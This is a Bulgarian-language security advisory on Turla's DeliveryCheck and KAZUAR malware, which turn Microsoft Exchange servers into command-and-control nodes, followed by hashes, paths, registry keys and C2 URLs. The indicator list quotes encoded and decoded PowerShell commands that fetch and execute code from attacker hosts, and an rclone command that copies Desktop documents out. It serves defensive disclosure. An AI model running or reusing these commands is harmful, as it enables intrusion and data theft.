Хакери превръщат Microsoft Exchange сървъри в Command and Control сървъри за зловреден код –  20.7.2023 г.

Oт Microsoft и CERT-UA предупреждават за нов вид атаки насочени към защитните механизми на Microsoft Exchange сървърите с нов зловреден код DeliveryCheck.

Зад атаката стои хакерската група Turla, спонсорирана от Руската Федерация. Първата фаза на атаката включва изпращане на phishing email  с прикачен Excel XLSM файл, който съдържа зловреден macros скрипт. При активиране на този скрипт се стартира PowerShell команда, която създава scheduled task (планирана задача), представящ се за актуализация на Firefox браузър. Този task изтегля DeliveryCheck backdoor, стартира се в оперативната памет, осъществява връзка с Command & Control сървър на Turla, от където получава отдалечено команди за изпълняване и инсталиране на други зловредни кодове.

След заразяване на устройствата с backdoor-а се използва за извличане на данни от компрометираните устройства чрез използване на Rclone (безплатен инструмент за синхронизиране на файлове към и от различни Cloud доставчици)

Друго характерно за DeliveryCheck е, че превръща Microsoft Exchange пощенски сървър в отдалечен Command & Control сървър, който от своя страна става част от схемата на разпространение. Инсталира се чрез Desired State Configuration (DSC), което е PowerShell функционалност, позволяваща на администраторите да създават стандартизирана сървърни конфигурации, и да я прилагат автоматично на множество клиентски устройства. Създава се конфигурация, която заражда base64 стринг, който представлява изпълним зловреден файл. Така Microsoft Exchange сървърите се превръщат в сървъри за разпространение на зловредения код.

В наблюдаваните атаки Turla инсталират KAZUAR backdoor с цел извличане на данни. Той позволява пълен кибершпионаж, влючително изпълнение на javascript на устройствата, кражба на данни от event logs, кражба на authentication tokens, кражба на бисквитки, акаунти от софтуер, включително от браузъри, FTP клиенти, VPN клиенти, KeePass, Azure, AWS, и Outlook акаунти. Освен това позволява ексфилтриране на съобщения на Signal Desktop клиент, включително и изпратени или получени файлове.

IoC:

cdf7fa901701ea1ef642aeb271c70361    1c97f92a144ac17e35c0e40dc89e12211ef5a7d5eb8db57ab093987ae6f3b9dc    localhost.mof (CAPIBAR server (MOF))

153b713b3c6e642f39993d65ab33c5f0    5cf64f37fac74dc8f3dcb58831c3f2ce2b3cf522db448b40acdab254dd46cb3e    Pending.mof (CAPIBAR server (MOF))

9ececb4acbf692c2a8ea411f2e7dd006    07f9b090172535089eb62a175e5deaf95853fdfd4bcabf099619c60057d38c57    Server.dll (CAPIBAR server)

5c7466a177fcaad2ebab131a54c28fab    bd7dbaf91ba162b6623292ebcdd2768c5d87e518240fe8ca200a81e9c7f01d76    Control.dll (CAPIBAR)

b63c2ec9a631e0217d39c4a43527a0ce    1c1bb64e38c3fbe1a8f0dcb94ded96b332296bcbf839de438a4838fb43b20af3    logon.aspx

420b7dc391f2cb0a9a684c1c48c334e2    01c5778be73c10c167fae6d7970c0be23a29af1873d743419b1803c035d92ef7    logon[1].aspx

491e462bf1213fede82925dea5df8fff    ba2c8df04bcba5c3cfd343a59d8b59b76779e6c27eb27b7ac73ded97e08f0f39    logon[1].aspx

9dd2bea4f2df8d3ef51dc10c6db2e07a    aaf7642f0cab75240ec65bc052a0a602366740b31754156b3a0c44dccec9bebe    SYNC[1]

8c56c22343853d3797037bdac2cec6c7    d4d7c12bdb66d40ad58c211dc6dd53a7494e03f9883336fa5464f0947530709f    wp-file-script.js

17402fc21c7bafae2c1a149035cd0835    19b7ddd3b06794abe593bf533d88319711ca15bb0a08901b4ab7e52aab015452    Control.dll (CAPIBAR)

d3065b4b1e8f6ecb63685219113ff0b8    4ef8db0ca305aaab9e2471b198168021c531862cb4319098302026b1cfa89947    Control.dll (CAPIBAR)

5210b3d85fd0026205baee2c77ac0acd    64e8744b39e15b76311733014327311acd77330f8a135132f020eac78199ac8a    two.exe (CAPIBAR)

4065e647380358d22926c24a63c26ac4    5e122ff3066b6ef2a89295df925431c151f1713708c99772687a30c3204064bd    Config.dat

11a289347b95aab157aa0efe4a59bf24    91dc8593ee573f3a07e9356e65e06aed58d8e74258313e3414a7de278b3b5233    Senatorial.exe (KAZUAR)

cba1f4c861240223332922d2913d18e5    b8ee794b04b69a1ee8687daabfe4f912368a500610a099e3072b03eeb66077f8    1.ps1

65102299bf8d7f0129ebbcb08a9c2d98    8168dc0baea6a74120fbabea261e83377697cb5f9726a2514f38ed04b46c56c8    message (Steel Signal’s „config.json“, „db.sqlite“)

C:\Windows\System32\config\systemprofile\AppData\Roaming\ASKOD\localhost.mof

C:\Windows\System32\config\systemprofile\AppData\Roaming\ZOV\localhost.mof

C:\Windows\System32\Configuration\Pending.mof

C:\ProgramData\ASUS\ASUS System Control Interface\AsusSoftwareManager\Config.dat

%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\8HIA0N4E\logon[1].aspx

%LOCALAPPDATA%\assembly\dl3\QKP9W8EK.5CJ\XRNLX3QV.5BO\3d7183c9\00000000_00000000\__AssemblyInfo__.ini

%LOCALAPPDATA%\assembly\dl3\QKP9W8EK.5CJ\XRNLX3QV.5BO\3d7183c9\00000000_00000000\logon.aspx

%LOCALAPPDATA%\Microsoft\OneDrive\Update\UpdateService.exe

%LOCALAPPDATA%\Microsoft\OneDrive\Update\rclone.conf

%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\UOIQCADZ\SYNC[1]

powershell -e JAB3AD0AbgBlAFcALQBPAGIAagBFAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AEUAYgBjAEwAaQBlAE4AdAA7ACQAZgBpAGwAZQA9ACQAdwAuAEQAbwB3AG4ATABvAGEAZABTAHQAUgBpAE4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBkAGUAbABhAGkAZABhAC4AdQBhAC8AcABsAHUAZwBpAG4AcwAvAHYAbQBzAGUAYQByAGMAaAAvAHcAcAAtAGMAbwBuAGYAaQBnAC0AdABoAGUAbQBlAHMALgBwAGgAcAAnACkAOwBpAEUAeAAgACQAZgBpAGwAZQA=

powershell -e JABHAHIAcQBkAHEAdwBkAGUAPQBOAGUAdwAtAE8AYgBqAEUAYwBUACAAUwBZAHMAVABlAE0ALgBOAEUAdAAuAFcAZQBiAEMATABpAGUATgB0ADsAJABpAHUAYQBXAD0AJABHAHIAcQBkAHEAdwBkAGUALgBEAE8AdwBOAEwATwBhAEQAUwB0AFIAaQBOAGcAKAAnAGgAVAB0AFAAcwA6AC8ALwBhAGwAZQBpAG0AcABvAHIAdABhAGQAbwByAGEALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AcwBsAGkAZABlAHMAXwBsAG8AZwBvAC8AJwApADsAYABpAG4AdgBPAGAASwBlAGAALQBgAEUAeABgAFAAcgBlAHMAcwBgAEkAbwBgAE4AIAAkAGkAdQBhAFcA

$w=neW-ObjEct system.net.wEbcLieNt;$file=$w.DownLoadStRiNg(‘hxxps://www.adelaida[.]ua/plugins/vmsearch/wp-config-themes.php’);iEx $file

$Grqdqwde=New-ObjEcT SYsTeM.NEt.WebCLieNt;$iuaW=$Grqdqwde.DOwNLOaDStRiNg(‘hxxPs://aleimportadora[.]net/images/slides_logo/’);invOKe-ExPressIoN $iuaW

„C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive\Update\UpdateService.exe“ „copy“ „C:\Users\%USERNAME%\Desktop“ „remote:%COMPUTERNAME%\Desktop“ „–include“ „*.{{jpe?g|txt|docx?|rtf|pdf|xlsx?|xlsm|pptx?|zip|rar|7z}}“ „-M“ „–max-size“ „50M“ „–max-age“ „200d“ „–bwlimit“ „1M:1M“ „–order-by“ „modtime,desc“ „–log-file=C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive\Update\log_1.dat“ „-vv“

\Mozilla\Updates Firefox Browser (Scheduled Task)

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBarApi\GameBarId

HKEY_CURRENT_USER\Software\Classes\CLSID\{84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\InprocServer32\1.0.0.0\CodeBase

HKEY_CURRENT_USER\Software\Classes\CLSID\{8989946A-2F3B-4BE9-874E-D0B2B534ACA0}\ScriptletURL

HKEY_CURRENT_USER\Software\Classes\CLSID\{84f0fae1-c27b-4f6f-807b-28cf6f96287d}\ScriptletURL

Мрежови IoC:

hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-plugins.php

hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-themes.php

hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-file-script.js

hXXps://atomydoc[.]kg/src/open_center/

hXXps://atomydoc[.]kg/src/open_center/?page=ccl

hXXps://atomydoc[.]kg/src/open_center/?page=fst

hXXps://atomydoc[.]kg/src/open_center/?page=snd

hXXps://atomydoc[.]kg/src/open_center/?page=trd

hXXps://aleimportadora[.]net/images/slides_logo/

hXXps://aleimportadora[.]net/images/slides_logo/?page=

hXXps://aleimportadora[.]net/images/slides_logo/fg/message

hXXps://aleimportadora[.]net/images/slides_logo/fg/music

hXXps://aleimportadora[.]net/images/slides_logo/fg/video

hXXps://aleimportadora[.]net/images/slides_logo/index.php

hXXps://octoberoctopus.co[.]za/wp-includes/sitemaps/web/

hXXps://sansaispa[.]com/wp-includes/images/gallery/

hXXps://www.pierreagencement[.]fr/wp-content/languages/index.php

hXXps://mail.aet.in[.]ua/outlook/api/logon.aspx

hXXps://mail.kzp[.]bg/outlook/api/logon.aspx

hXXps://mail.numina[.]md/owa/scripts/logon.aspx (CAPIBAR C2URL)

hXXps://mail.aet.in[.]ua/outlook/api/logoff.aspx (CAPIBAR C2URL)

hXXps://mail.arlingtonhousing[.]us/outlook/api/logoff.aspx (CAPIBAR C2URL)

hXXps://mail.kzp[.]bg/outlook/api/logoff.aspx (CAPIBAR C2URL)

hXXps://mail.lechateaudelatour[.]fr/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITHCERT/SYNC (CAPIBAR C2URL)

hXXps://mail.lebsack[.]de/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITHCERT/SYNC (CAPIBAR C2URL)

Източниик на информация:

https://cert.gov.ua/article/5213167